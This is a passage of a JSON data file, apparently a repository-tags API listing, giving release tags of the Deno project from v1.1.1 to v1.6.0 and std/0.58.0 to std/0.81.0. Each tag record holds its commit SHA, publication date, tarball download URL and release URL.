d_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@st